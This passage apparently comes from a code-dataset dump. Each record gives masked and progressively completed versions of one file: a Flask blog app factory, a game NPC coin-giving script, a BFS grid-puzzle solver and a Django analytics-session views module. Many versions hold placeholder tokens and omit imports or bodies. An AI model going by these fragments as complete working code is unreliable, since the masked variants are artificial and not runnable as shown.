"step-3": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email, size):\n return helpers.gravatar(email, size)\n\n @app.template_filter()\n def format_date(date, s='full'):\n return helpers.format_date(date, s)\n\n @app.template_filter()\n def format_datetime(time, s='full'):\n return helpers.format_datetime(time, s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s' % date\n\n\ndef configure_logging(app):\n mail_handler = SMTPHandler(app.config['MAIL_SERVER'], app.config[\n 'DEFAULT_MAIL_SENDER'], app.config['ADMINS'], 'application error',\n (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']))\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n debug_log = os.path.join(app.root_path, app.config['DEBUG_LOG'])\n debug_file_handler = RotatingFileHandler(debug_log, maxBytes=100000,\n backupCount=10)\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n error_log = os.path.join(app.root_path, app.config['ERROR_LOG'])\n error_file_handler = RotatingFileHandler(error_log, maxBytes=100000,\n backupCount=10)\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n",
"step-5": "#!/usr/bin/env python\n#coding=utf-8\n\n\"\"\"\n __init__.py\n\n :license: BSD, see LICENSE for more details.\n\"\"\"\n\nimport os\nimport logging\nimport sys\n\nfrom logging.handlers import SMTPHandler, RotatingFileHandler\nfrom flask import Flask, g, session, request, flash, redirect, jsonify, url_for\nfrom flaskext.babel import Babel\n\nfrom bg import helpers\nfrom bg.extensions import db, mail, cache, photos, identity_changed, Identity\n\nfrom bg.views import frontend,admin,post,account\nfrom bg.models import Post\n\nDEFAULT_MODULES = (\n (frontend, \"\"),\n (post, \"/post\"),\n (account, \"/account\"),\n (admin, \"/admin\"),)\n\nDEFAULT_APP_NAME = 'bg'\n\ndef create_app(config=None, modules=None):\n\n if modules is None:\n modules = DEFAULT_MODULES\n\n app = Flask(DEFAULT_APP_NAME)\n\n #config\n app.config.from_pyfile(config)\n configure_extensions(app)\n\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n\n # register module\n configure_modules(app, modules)\n\n return app\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n #if request.is_xhr:\n # return jsonfiy(error=_(\"Login required\"))\n flash((\"Please login to see this page\"), \"error\")\n #return redirect(url_for(\"account.login\", next=request.path))\n return redirect(url_for(\"account.login\"))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0,'Login')\n\n\ndef configure_extensions(app):\n # configure extensions\n db.init_app(app)\n #db.app = app\n #db.create_all()\n mail.init_app(app)\n cache.init_app(app)\n #setup_themes(app)\n\ndef configure_context_processors(app):\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):\n item = (dt.create_date.year, dt.create_date.month)\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\ndef configure_modules(app, modules):\n\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email,size):\n return helpers.gravatar(email,size)\n\n @app.template_filter()\n def format_date(date,s='full'):\n return helpers.format_date(date,s)\n\n @app.template_filter()\n def format_datetime(time,s='full'):\n return helpers.format_datetime(time,s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s'%date\n\ndef configure_logging(app):\n\n mail_handler = \\\n SMTPHandler(app.config['MAIL_SERVER'],\n app.config['DEFAULT_MAIL_SENDER'],\n app.config['ADMINS'],\n 'application error',\n (\n app.config['MAIL_USERNAME'],\n app.config['MAIL_PASSWORD'],\n ))\n\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s '\n '[in 
%(pathname)s:%(lineno)d]')\n\n debug_log = os.path.join(app.root_path,\n app.config['DEBUG_LOG'])\n\n debug_file_handler = \\\n RotatingFileHandler(debug_log,\n maxBytes=100000,\n backupCount=10)\n\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n\n error_log = os.path.join(app.root_path,\n app.config['ERROR_LOG'])\n\n error_file_handler = \\\n RotatingFileHandler(error_log,\n maxBytes=100000,\n backupCount=10)\n\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n\n",
"step-ids": [
6,
8,
9,
10,
13
]
}
|
[
6,
8,
9,
10,
13
] |
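configure_logging() in the record above attaches three handlers to the Flask app logger: an SMTP handler for errors and two size-rotated log files. The rotating-file part is plain standard library and can be tried in isolation; the sketch below assumes nothing from the record beyond the formatter string and the 100 kB / 10-backup rotation policy, and the 'debug.log' file name is made up for the demo (the SMTP handler is omitted because it needs a live mail server).

import logging
from logging.handlers import RotatingFileHandler

logger = logging.getLogger('logging-sketch')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(
    '%(asctime)s %(levelname)s: %(message)s '
    '[in %(pathname)s:%(lineno)d]')
# keep at most 10 backups of roughly 100 kB each, as in the record
handler = RotatingFileHandler('debug.log', maxBytes=100000, backupCount=10)
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.debug('handler configured')  # written to debug.log, rotated as it grows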
<|reserved_special_token_0|>
<|reserved_special_token_1|>
if sm.hasItem(4310100, 1):
sm.setSpeakerID(9390220)
sm.sendSayOkay(
"You can't start your voyage until you finish the tutorial quest!")
else:
sm.setSpeakerID(9390220)
sm.sendNext(
'What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.'
)
sm.setSpeakerID(9390220)
sm.sendSay("Just remember, you can't trade without gold!")
sm.giveItem(4310100, 10)
sm.setSpeakerID(9390220)
    sm.sendPrev('Check to make sure you have coins in your inventory.')
<|reserved_special_token_1|>
# Created by MechAviv
# [Maestra Fiametta] | [9390220]
# Commerci Republic : San Commerci
if sm.hasItem(4310100, 1):
sm.setSpeakerID(9390220)
sm.sendSayOkay("You can't start your voyage until you finish the tutorial quest!")
else:
sm.setSpeakerID(9390220)
sm.sendNext("What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.")
sm.setSpeakerID(9390220)
sm.sendSay("Just remember, you can't trade without gold!")
sm.giveItem(4310100, 10)
sm.setSpeakerID(9390220)
sm.sendPrev("Check to make sure there you have coins in your inventory.")
|
flexible
|
{
"blob_id": "c4b9fdba9e9eeccc52999dab9232302f159c882a",
"index": 588,
"step-1": "<mask token>\n",
"step-2": "if sm.hasItem(4310100, 1):\n sm.setSpeakerID(9390220)\n sm.sendSayOkay(\n \"You can't start your voyage until you finish the tutorial quest!\")\nelse:\n sm.setSpeakerID(9390220)\n sm.sendNext(\n 'What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.'\n )\n sm.setSpeakerID(9390220)\n sm.sendSay(\"Just remember, you can't trade without gold!\")\n sm.giveItem(4310100, 10)\n sm.setSpeakerID(9390220)\n sm.sendPrev('Check to make sure there you have coins in your inventory.')\n",
"step-3": "# Created by MechAviv\n# [Maestra Fiametta] | [9390220]\n# Commerci Republic : San Commerci\nif sm.hasItem(4310100, 1):\n sm.setSpeakerID(9390220)\n sm.sendSayOkay(\"You can't start your voyage until you finish the tutorial quest!\")\nelse:\n sm.setSpeakerID(9390220)\n sm.sendNext(\"What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.\")\n\n\n sm.setSpeakerID(9390220)\n sm.sendSay(\"Just remember, you can't trade without gold!\")\n\n\n sm.giveItem(4310100, 10)\n sm.setSpeakerID(9390220)\n sm.sendPrev(\"Check to make sure there you have coins in your inventory.\")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
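The script above runs inside a game server that injects the `sm` script-manager object, so it cannot be executed on its own. For offline experimentation, one option is a recording stub like the hypothetical sketch below; StubScriptManager and its behaviour are inventions for illustration, not part of the real server API.

class StubScriptManager:
    def __init__(self, has_coins):
        self._has_coins = has_coins
        self.calls = []
    def hasItem(self, item_id, count):
        return self._has_coins
    def __getattr__(self, name):
        # record any other script call (setSpeakerID, sendNext, giveItem, ...)
        def method(*args):
            self.calls.append((name, args))
        return method

sm = StubScriptManager(has_coins=False)
if sm.hasItem(4310100, 1):
    sm.sendSayOkay("You can't start your voyage until you finish the tutorial quest!")
else:
    sm.giveItem(4310100, 10)
print(sm.calls)  # [('giveItem', (4310100, 10))]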
from collections import deque
n = -1
D = [(-1 , 0) , (0 , 1) , (1 , 0) , (0 , -1)]
B = -1
up = 0
right = 1
down = 2
left = 3
dic = {}
dic[0] = 'up'
dic[1] = 'right'
dic[2] = 'down'
dic[3] = 'left'
def possi(y , x):
global n
if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:
return False
return True
def move(d , ay , ax , by , bx):
ay += D[d][0]
by += D[d][0]
ax += D[d][1]
bx += D[d][1]
if possi(ay , ax) and possi(by , bx):
return True
return False
def rotate(y , x , tail , dest):
    # check the destination cell and the diagonal cell in between
if possi(y + D[dest][0] , x + D[dest][1]) and possi(y + D[tail][0] + D[dest][0] , x + D[tail][1] + D[dest][1] ):
return True
return False
def bfs(dp):
q = deque()
# q.append((y , x , tail , step))
q.append( (0 , 1 , 3 , 0) )
while q:
y , x , tail , step = q.popleft()
ty , tx = y + D[tail][0] , x + D[tail][1]
for d in range(4):
if move(d , y , x , ty , tx):
ny = y + D[d][0]
nx = x + D[d][1]
                if step + 1 < dp[ny][nx][tail]: # position changes, tail direction stays the same
                    dp[ny][nx][tail] = step + 1
                    q.append( (ny , nx , tail , step + 1) )
            if d % 2 == tail % 2: # same axis as the tail: no rotating onto itself or through 180 degrees
                continue
            #rotate(ori_tail , new_tail)
            if rotate(y , x , tail , d): # if possi(ry , rx) and possi( (ry + ty) // 2, (ry + tx) // 2): # the cell the tail swings to, plus the diagonal in between
                if step + 1 < dp[y][x][d]:
                    dp[y][x][d] = step + 1
                    q.append( (y , x , d , step + 1) ) # position stays, tail direction changes
            # swap head and tail
            y , x , ty , tx = ty , tx , y , x
            if rotate(y , x , (tail + 2) % 4 , d): # forgot this swap at first when changing the function
                if step + 1 < dp[y][x][d]:
                    dp[y][x][d] = step + 1
                    q.append( (y , x , d , step + 1) ) # position stays, tail direction changes
            y , x , ty , tx = ty , tx , y , x
global up , down , right , left
cs = [1e9] * 4
cs[0] = dp[n-1][n-1][up]
cs[1] = dp[n-1][n-1][left]
cs[2] = dp[n-2][n-1][down]
cs[3] = dp[n-1][n-2][right]
#print(cs)
return min(cs)
def solution(b):
global n , B
B = [el[:] for el in b]
n = len(b)
dp = [ [ [1e9] * 4 for _ in range (n)] for _ in range(n)]
    # dir: tail pointing up, right, down, left
dp[0][1][3] = 0
answer = bfs(dp)
return answer
#print(solution([[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 1, 1, 0]]))
#print(solution([[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1], [0, 0, 1, 0, 0, 0, 0]]))
#print(solution( [[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 1, 0, 0, 0, 0]]))
#print(solution([[0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0]]))
|
normal
|
{
"blob_id": "feb912ac899208618f00c894458c1fda7a402652",
"index": 1452,
"step-1": "<mask token>\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\n<mask token>\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-2": "<mask token>\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\ndef bfs(dp):\n q = deque()\n q.append((0, 1, 3, 0))\n while q:\n y, x, tail, step = q.popleft()\n ty, tx = y + D[tail][0], x + D[tail][1]\n for d in range(4):\n if move(d, y, x, ty, tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]:\n dp[ny][nx][tail] = step + 1\n q.append((ny, nx, tail, step + 1))\n if d % 2 == tail % 2:\n continue\n if rotate(y, x, tail, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n if rotate(y, x, (tail + 2) % 4, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n global up, down, right, left\n cs = [1000000000.0] * 4\n cs[0] = dp[n - 1][n - 1][up]\n cs[1] = dp[n - 1][n - 1][left]\n cs[2] = dp[n - 2][n - 1][down]\n cs[3] = dp[n - 1][n - 2][right]\n return min(cs)\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-3": "<mask token>\nn = -1\nD = [(-1, 0), (0, 1), (1, 0), (0, -1)]\nB = -1\nup = 0\nright = 1\ndown = 2\nleft = 3\ndic = {}\ndic[0] = 'up'\ndic[1] = 'right'\ndic[2] = 'down'\ndic[3] = 'left'\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\ndef bfs(dp):\n q = deque()\n q.append((0, 1, 3, 0))\n while q:\n y, x, tail, step = q.popleft()\n ty, tx = y + D[tail][0], x + D[tail][1]\n for d in range(4):\n if move(d, y, x, ty, tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]:\n dp[ny][nx][tail] = step + 1\n q.append((ny, nx, tail, step + 1))\n if d % 2 == tail % 2:\n continue\n if rotate(y, x, tail, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n if rotate(y, x, (tail + 2) % 4, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n global up, down, right, left\n cs = [1000000000.0] * 4\n cs[0] = dp[n - 1][n - 1][up]\n cs[1] = dp[n - 1][n - 1][left]\n cs[2] = dp[n - 2][n - 1][down]\n cs[3] = dp[n - 1][n - 2][right]\n return min(cs)\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-4": "from collections import deque\nn = -1\nD = [(-1, 0), (0, 1), (1, 0), (0, -1)]\nB = -1\nup = 0\nright = 1\ndown = 2\nleft = 3\ndic = {}\ndic[0] = 'up'\ndic[1] = 'right'\ndic[2] = 'down'\ndic[3] = 'left'\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\ndef bfs(dp):\n q = deque()\n q.append((0, 1, 3, 0))\n while q:\n y, x, tail, step = q.popleft()\n ty, tx = y + D[tail][0], x + D[tail][1]\n for d in range(4):\n if move(d, y, x, ty, tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]:\n dp[ny][nx][tail] = step + 1\n q.append((ny, nx, tail, step + 1))\n if d % 2 == tail % 2:\n continue\n if rotate(y, x, tail, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n if rotate(y, x, (tail + 2) % 4, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n global up, down, right, left\n cs = [1000000000.0] * 4\n cs[0] = dp[n - 1][n - 1][up]\n cs[1] = dp[n - 1][n - 1][left]\n cs[2] = dp[n - 2][n - 1][down]\n cs[3] = dp[n - 1][n - 2][right]\n return min(cs)\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-5": "from collections import deque\nn = -1\nD = [(-1 , 0) , (0 , 1) , (1 , 0) , (0 , -1)]\nB = -1\nup = 0\nright = 1\ndown = 2\nleft = 3\ndic = {}\ndic[0] = 'up'\ndic[1] = 'right'\ndic[2] = 'down'\ndic[3] = 'left'\n\ndef possi(y , x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\ndef move(d , ay , ax , by , bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay , ax) and possi(by , bx):\n return True\n return False\n\ndef rotate(y , x , tail , dest):\n # 목적지, 대각선 검사\n if possi(y + D[dest][0] , x + D[dest][1]) and possi(y + D[tail][0] + D[dest][0] , x + D[tail][1] + D[dest][1] ):\n return True\n return False\n\ndef bfs(dp):\n q = deque()\n # q.append((y , x , tail , step))\n q.append( (0 , 1 , 3 , 0) )\n while q:\n y , x , tail , step = q.popleft()\n ty , tx = y + D[tail][0] , x + D[tail][1]\n \n for d in range(4):\n if move(d , y , x , ty , tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]: # 위치 바뀜 , 꼬리 같음\n dp[ny][nx][tail] = step + 1\n q.append( (ny , nx , tail , step + 1) )\n\n if d % 2 == tail % 2: # 자신이거나 180는 안돌음\n continue\n\n #rotate(ori_tail , new_tail)\n if rotate(y , x , tail , d): # if possi(ry , rx) and possi( (ry + ty) // 2, (ry + tx) // 2): # 꼬리가 가는 방향 , 대각선 ??\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append( (y , x , d , step + 1) ) # 위치 같음 , 꼬리 바뀜\n\n # 머리 꼬리 스왑\n y , x , ty , tx = ty , tx , y , x \n if rotate(y , x , (tail + 2) % 4 , d): # 이 함수 바꿔주다 스왑 까먹음\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append( (y , x , d , step + 1) ) # 위치 같음 , 꼬리 바뀜\n y , x , ty , tx = ty , tx , y , x\n\n\n\n\n global up , down , right , left\n cs = [1e9] * 4\n cs[0] = dp[n-1][n-1][up]\n cs[1] = dp[n-1][n-1][left]\n cs[2] = dp[n-2][n-1][down]\n cs[3] = dp[n-1][n-2][right]\n #print(cs)\n return min(cs)\n \n\n \n\n\n\ndef solution(b):\n global n , B\n B = [el[:] for el in b]\n n = len(b)\n dp = [ [ [1e9] * 4 for _ in range (n)] for _ in range(n)]\n # dir: 꼬리가 위, 오, 아, 왼\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n\n#print(solution([[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 1, 1, 0]]))\n\n#print(solution([[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1], [0, 0, 1, 0, 0, 0, 0]]))\n\n#print(solution( [[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 1, 0, 0, 0, 0]]))\n\n#print(solution([[0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0]]))",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
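Assuming the definitions in the record above (solution() and its helpers) are in scope, the commented-out tests at the bottom can be revived directly; here is the first one as a usage sketch. The printed value is the minimum number of steps for the two-cell piece to reach the bottom-right corner, as selected by the cs[] aggregation at the end of bfs().

board = [[0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0],
         [0, 0, 0, 0, 0],
         [0, 0, 1, 1, 0]]
print(solution(board))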
<|reserved_special_token_0|>
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template('aimodel/index.html')
context = {}
context['err_msg'] = err_msg
return HttpResponse(template.render(context, request))
<|reserved_special_token_0|>
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect('/')
try:
dataset = request.POST['dataset']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
if 'analytics' in request.session:
del request.session['analytics']
request.session['analytics'] = AnalyticSession(dataset)
bucket_info = request.session['analytics'].bucket_info()
template = loader.get_template('ui/analytics.html')
context = dict()
context['init_buckets'] = json.dumps(bucket_info['buckets'])
context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']
)
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect('/')
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason='Access denied!')
if 'analytics' not in request.session:
err = 'Could not fetch analytic session data.'
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session['analytics'].bucket_info())
<|reserved_special_token_0|>
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
new_bucket_name = request_data['new_bucket_name']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data['bucket1_id']
bucket2_id = request_data['bucket2_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
